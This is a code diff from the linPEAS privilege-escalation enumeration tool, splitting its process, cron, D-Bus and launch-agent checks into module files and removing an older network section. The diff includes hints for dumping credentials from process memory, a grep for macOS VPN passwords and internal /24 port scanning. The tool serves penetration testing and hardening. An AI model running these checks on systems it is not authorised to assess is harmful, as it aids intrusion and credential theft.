+      echo "$l" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},";
+      if ! echo "$l" | grep -qE "$dbuslistG"; then
+        srvc_object=$(echo $l | cut -d " " -f1)
+        srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ')
+        if [ "$srvc_object_info" ]; then
+          echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED},"
+        fi
+      fi
+    done
+  else echo_not_found "busctl"
+  fi
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/17_DBus_config_files.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/17_DBus_config_files.sh
@@ -0,0 +1,40 @@
+# Title: Processes & Cron & Services & Timers - D-Bus config files
+# ID: PR_DBus_config_files
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Enumerate D-Bus config files
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $IAMROOT, $mygroups, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER
+# Initial Functions:
+# Generated Global Variables: $genpol, $userpol, $grppol
+# Fat linpeas: 0
+# Small linpeas: 0
+
+print_2title "D-Bus config files"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
+if [ "$PSTORAGE_DBUS" ]; then
+  printf "%s\n" "$PSTORAGE_DBUS" | while read d; do
+    for f in $d/*; do
+      if ! [ "$IAMROOT" ] && [ -w "$f" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
+        echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g"
+      fi
+
+      genpol=$(grep "<policy>" "$f" 2>/dev/null)
+      if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
+      #if [ "`grep \"<policy user=\\\"$USER\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi
+
+      userpol=$(grep "<policy user=" "$f" 2>/dev/null | grep -v "root")
+      if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
+      #for g in `groups`; do
+      #  if [ "`grep \"<policy group=\\\"$g\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi
+      #done
+      grppol=$(grep "<policy group=" "$f" 2>/dev/null | grep -v "root")
+      if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
+
+      #TODO: identify allows in context="default"
+    done
+  done
+fi
+echo ""
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/1_List_processes.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/1_List_processes.sh
@@ -0,0 +1,46 @@
+# Title: Processes & Cron & Services & Timers - List proccesses
+# ID: PR_List_processes
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: List running proccesses removing the ones that aren't interesting
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info, print_ps
+# Global Variables: $capsB, $knw_usrs, $nosh_usrs, $NOUSEPS, $processesB, $processesDump, $processesVB, $rootcommon, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $Wfolders
+# Initial Functions:
+# Generated Global Variables: $pslist, $cpid, $caphex, $psline
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Running processes (cleaned)"
+
+  if [ "$NOUSEPS" ]; then
+    printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
+  fi
+  print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
+
+  if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then
+    echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users"
+  fi
+
+  if [ "$NOUSEPS" ]; then
+    print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
+    pslist=$(print_ps)
+  else
+    (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
+      echo "$psline"  | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
+      if [ "$(command -v capsh || echo -n '')" ] && ! echo "$psline" | grep -q root; then
+        cpid=$(echo "$psline" | awk '{print $2}')
+        caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')"
+        if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then
+          printf "  └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g"
+        fi
+      fi
+    done
+    pslist=$(ps auxwww)
+    echo ""
+  fi
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/2_Process_cred_in_memory.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/2_Process_cred_in_memory.sh
@@ -0,0 +1,26 @@
+# Title: Processes & Cron & Services & Timers - Processes with credentials inside memory
+# ID: PR_Process_cred_in_memory
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Processes with credentials inside memory
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title, print_info
+# Global Variables: $pslist, $SEARCH_IN_FOLDER
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Processes with credentials in memory (root req)"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory"
+  if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi
+  if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi
+  if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi
+  if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi
+  if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi
+  if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/3_Process_binaries_perms.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/3_Process_binaries_perms.sh
@@ -0,0 +1,29 @@
+# Title: Processes & Cron & Services & Timers - Process binaries permissions
+# ID: PR_Process_binaries_perms
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Check the permissions of the binaries of the running processes
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $knw_usrs, $nosh_usrs, $NOUSEPS, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $Wfolders
+# Initial Functions:
+# Generated Global Variables: $binW, $bpath
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  if [ "$NOUSEPS" ]; then
+    print_2title "Binary processes permissions (non 'root root' and not belonging to current user)"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
+    binW="IniTialiZZinnggg"
+    ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do
+      if [ -w "$bpath" ]; then
+        binW="$binW|$bpath"
+      fi
+    done
+    ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
+    echo ""
+  fi
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/4_Processes_PPID_different_user.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/4_Processes_PPID_different_user.sh
@@ -0,0 +1,36 @@
+# Title: Processes & Cron & Services & Timers - Process opened by other users
+# ID: PR_Processes_PPID_different_user
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Processes whose PPID belongs to a different user (not root)
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $nosh_usrs, $NOUSEPS, $SEARCH_IN_FOLDER, $sh_usrs, $USER
+# Initial Functions:
+# Generated Global Variables: $ppid_user, $pid, $ppid, $user
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then
+  print_2title "Processes whose PPID belongs to a different user (not root)"
+  print_info "You will know if a user can somehow spawn processes as a different user"
+  
+  # Function to get user by PID
+  get_user_by_pid() {
+    ps -p "$1" -o user | grep -v "USER"
+  }
+
+  # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user
+  ps -eo pid,ppid,user | grep -v "PPID" | while read -r pid ppid user; do
+    if [ "$ppid" = "0" ]; then
+      continue
+    fi
+    ppid_user=$(get_user_by_pid "$ppid")
+    if echo "$user" | grep -Eqv "$ppid_user|root$"; then
+      echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
+    fi
+  done
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/5_Files_open_process_other_user.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/5_Files_open_process_other_user.sh
@@ -0,0 +1,23 @@
+# Title: Processes & Cron & Services & Timers - Files opened by processes belonging to other users
+# ID: PR_Files_open_process_other_user
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Files opened by processes belonging to other users
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $IAMROOT, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  if ! [ "$IAMROOT" ]; then
+    print_2title "Files opened by processes belonging to other users"
+    print_info "This is usually empty because of the lack of privileges to read other user processes information"
+    lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
+    echo ""
+  fi
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/6_Different_procs_1min.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/6_Different_procs_1min.sh
@@ -0,0 +1,30 @@
+# Title: Processes & Cron & Services & Timers - Different processes 1 min
+# ID: PR_Different_procs_1min
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Different processes executed during 1 min
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $nosh_usrs, $sh_usrs, $Wfolders
+# Initial Functions:
+# Generated Global Variables: $temp_file
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
+    print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs"
+    temp_file=$(mktemp)
+    if [ "$(ps -e -o user,command 2>/dev/null)" ]; then 
+      for i in $(seq 1 1210); do 
+        ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05; 
+      done;
+      sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"; 
+      rm "$temp_file";
+    fi
+    echo ""
+  fi
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/7_Systemd_path.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/7_Systemd_path.sh
@@ -0,0 +1,22 @@
+# Title: Processes & Cron & Services & Timers - Systemd PATH
+# ID: PR_Systemd_path
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Systemd PATH
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $SEARCH_IN_FOLDER, $Wfolders
+# Initial Functions:
+# Generated Global Variables: $WRITABLESYSTEMDPATH
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Systemd PATH"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths"
+  systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
+  WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders")
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/8_Cron_jobs.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/8_Cron_jobs.sh
@@ -0,0 +1,33 @@
+# Title: Processes & Cron & Services & Timers - Cron jobs
+# ID: PR_Cron_jobs
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Enumerate system cron jobs
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title, print_info
+# Global Variables: $cronjobsG, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $Wfolders, $cronjobsB
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "Cron jobs"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
+  command -v crontab 2>/dev/null || echo_not_found "crontab"
+  crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
+  command -v incrontab 2>/dev/null || echo_not_found "incrontab"
+  incrontab -l 2>/dev/null
+  ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
+  cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},"  | sed "s,root,${SED_RED},"
+  crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
+  ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
+  atq 2>/dev/null
+else
+  print_2title "Cron jobs"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
+  find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \;
+fi
+echo ""
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/9_Macos_launch_agents_daemons.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/9_Macos_launch_agents_daemons.sh
@@ -0,0 +1,55 @@
+# Title: Processes & Cron & Services & Timers - Third party LaunchAgents & LaunchDemons
+# ID: PR_Macos_launch_agents_daemons
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Third party LaunchAgents & LaunchDemons
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $MACPEAS, $SEARCH_IN_FOLDER
+# Initial Functions:
+# Generated Global Variables: $program
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  if [ "$MACPEAS" ]; then
+    print_2title "Third party LaunchAgents & LaunchDemons"
+    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd"
+    ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null
+    echo ""
+
+    print_2title "Writable System LaunchAgents & LaunchDemons"
+    find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do
+      program=""
+      program=$(defaults read "$f" Program 2>/dev/null)
+      if ! [ "$program" ]; then
+        program=$(defaults read "$f" ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
+      fi
+      if [ -w "$program" ]; then
+        echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},";
+      fi
+    done
+    echo ""
+
+    print_2title "StartupItems"
+    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items"
+    ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null
+    echo ""
+
+    print_2title "Login Items"
+    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items"
+    osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null
+    echo ""
+
+    print_2title "SPStartupItemDataType"
+    system_profiler SPStartupItemDataType
+    echo ""
+
+    print_2title "Emond scripts"
+    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond"
+    ls -l /private/var/db/emondClients
+    echo ""
+  fi
+fi
--- a/linPEAS/builder/linpeas_parts/5_network_information.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information.sh
@@ -1,192 +0,0 @@
-###########################################
-#---------) Network Information (---------#
-###########################################
-
-if [ "$MACOS" ]; then
-  print_2title "Network Capabilities"
-  warn_exec system_profiler SPNetworkDataType
-  echo ""
-fi
-
-#-- NI) Hostname, hosts and DNS
-print_2title "Hostname, hosts and DNS"
-cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
-warn_exec dnsdomainname 2>/dev/null
-echo ""
-
-#-- NI) /etc/inetd.conf
-if [ "$EXTRA_CHECKS" ]; then
-  print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf"
-  (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf"
-  echo ""
-fi
-
-#-- NI) Interfaces
-print_2title "Interfaces"
-cat /etc/networks 2>/dev/null
-(ifconfig || ip a || (cat /proc/net/dev; cat /proc/net/fib_trie; cat /proc/net/fib_trie6)) 2>/dev/null
-echo ""
-
-#-- NI) Neighbours
-if [ "$EXTRA_CHECKS" ]; then
-  print_2title "Networks and neighbours"
-  if [ "$MACOS" ]; then
-    netstat -rn 2>/dev/null
-  else
-    (route || ip n || cat /proc/net/route) 2>/dev/null
-  fi
-  (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null
-  echo ""
-fi
-
-if [ "$MACPEAS" ]; then
-  print_2title "Firewall status"
-  warn_exec system_profiler SPFirewallDataType
-fi
-
-#-- NI) Iptables
-if [ "$EXTRA_CHECKS" ]; then
-  print_2title "Iptables rules"
-  (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules"
-  echo ""
-fi
-
-#-- NI) Ports
-print_2title "Active Ports"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports"
-( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
-echo ""
-
-#-- NI) MacOS hardware ports
-if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then
-  print_2title "Hardware Ports"
-  networksetup -listallhardwareports
-  echo ""
-
-  print_2title "VLANs"
-  networksetup -listVLANs
-  echo ""
-
-  print_2title "Wifi Info"
-  networksetup -getinfo Wi-Fi
-  echo ""
-
-  print_2title "Check Enabled Proxies"
-  scutil --proxy
-  echo ""
-
-  print_2title "Wifi Proxy URL"
-  networksetup -getautoproxyurl Wi-Fi
-  echo ""
-  
-  print_2title "Wifi Web Proxy"
-  networksetup -getwebproxy Wi-Fi
-  echo ""
-
-  print_2title "Wifi FTP Proxy"
-  networksetup -getftpproxy Wi-Fi
-  echo ""
-fi
-
-#-- NI) tcpdump
-print_2title "Can I sniff with tcpdump?"
-timeout 1 tcpdump >/dev/null 2>&1
-if [ $? -eq 124 ]; then #If 124, then timed out == It worked
-    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sniffing"
-    echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED},"
-else echo_no
-fi
-echo ""
-
-#-- NI) Internet access
-if [ "$AUTO_NETWORK_SCAN" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then
-  print_2title "Internet Access?"
-  check_tcp_80 2>/dev/null &
-  check_tcp_443 2>/dev/null &
-  check_icmp 2>/dev/null &
-  check_dns 2>/dev/null &
-  wait
-  echo ""
-fi
-
-if [ "$AUTO_NETWORK_SCAN" ]; then
-  if ! [ "$FOUND_NC" ] && ! [ "$FOUND_BASH" ]; then
-    printf $RED"[-] $SCAN_BAN_BAD\n$NC"
-    echo "The network is not going to be scanned..."
-  
-  elif ! [ "$(command -v ifconfig)" ] && ! [ "$(command -v ip a)" ]; then
-    printf $RED"[-] No ifconfig or ip commands, cannot find local ips\n$NC"
-    echo "The network is not going to be scanned..."
-  
-  else
-    print_2title "Scanning local networks (using /24)"
-
-    if ! [ "$PING" ] && ! [ "$FPING" ]; then
-      printf $RED"[-] $DISCOVER_BAN_BAD\n$NC"
-    fi
-
-    select_nc
-    local_ips=$( (ip a 2>/dev/null || ifconfig) | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.")
-    printf "%s\n" "$local_ips" | while read local_ip; do
-      if ! [ -z "$local_ip" ]; then
-        print_3title "Discovering hosts in $local_ip/24"
-        
-        if [ "$PING" ] || [ "$FPING" ]; then
-          discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp
-        fi
-        
-        discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp
-        
-        sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips
-        rm $Wfolder/.ips.tmp 2>/dev/null
-        
-        while read disc_ip; do
-          me=""
-          if [ "$disc_ip" = "$local_ip" ]; then
-            me=" (local)"
-          fi
-          
-          echo "Scanning top ports of ${disc_ip}${me}"
-          (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
-          echo ""
-        done < $Wfolder/.ips
-        
-        rm $Wfolder/.ips 2>/dev/null
-        echo ""
-      fi
-    done
-    
-    print_3title "Scanning top ports of host.docker.internal"
-    (tcp_port_scan "host.docker.internal" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
-    echo ""
-  fi
-fi
-
-if [ "$MACOS" ]; then
-  print_2title "Any MacOS Sharing Service Enabled?"
-  rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l);
-  scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l);
-  flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l);
-  rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l);
-  rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l);
-  bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l);
-  printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM";
-  echo ""
-  print_2title "VPN Creds"
-  system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password"  | sed -${E} "s,Password|Authorization Name.*,${SED_RED},"
-  echo ""
-
-  if [ "$EXTRA_CHECKS" ]; then
-    print_2title "Bluetooth Info"
-    warn_exec system_profiler SPBluetoothDataType
-    echo ""
-
-    print_2title "Ethernet Info"
-    warn_exec system_profiler SPEthernetDataType
-    echo ""
-
-    print_2title "USB Info"
-    warn_exec system_profiler SPUSBDataType
-    echo ""
-  fi
-fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/10_Macos_hardware_ports.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/10_Macos_hardware_ports.sh
@@ -0,0 +1,40 @@
+# Title: Network Information - MacOS hardware ports
+# ID: NT_Macos_hardware_ports
+# Author: Carlos Polop
+# Last Update: 22-08-2023
